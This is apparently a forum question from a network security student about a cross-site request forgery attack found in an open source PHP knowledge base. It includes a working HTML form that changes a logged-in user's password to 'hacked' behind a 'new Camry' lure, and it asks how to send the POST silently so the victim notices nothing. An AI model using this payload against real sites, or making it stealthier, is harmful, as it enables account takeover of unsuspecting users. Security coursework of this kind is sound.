Hey guys, I'm taking a network security class, and one of our purposes is to find security bugs in open source projects.
This one project that I'm working on seems susceptible to CSRF. I created the following attack, where I trick the user into clicking a link containing the following:
<form onsubmit="top." action="http://localhost/aphpkb/change_password.php" method="post">
<input type="hidden" value="hacked" name="password1" size="20" maxlength="20" />
<input type="hidden" value="hacked" name="password2" size="20" maxlength="20" />
<input type="submit" name="submit" value="Click here for a new Camry!!" />
</form>
This attack works and changes the site password when the user is currently logged in to the site. However, the result of the page being received by the end user. I tried various methods of "silently" POST forms (PHP-based methods and JS-based methods) to no avail.
Can someone give some recommendations and maybe point me in the right direction as to whether it is possible to quietly send POST to another site? I am very grateful for this guys thank you very much!
ntsue source
share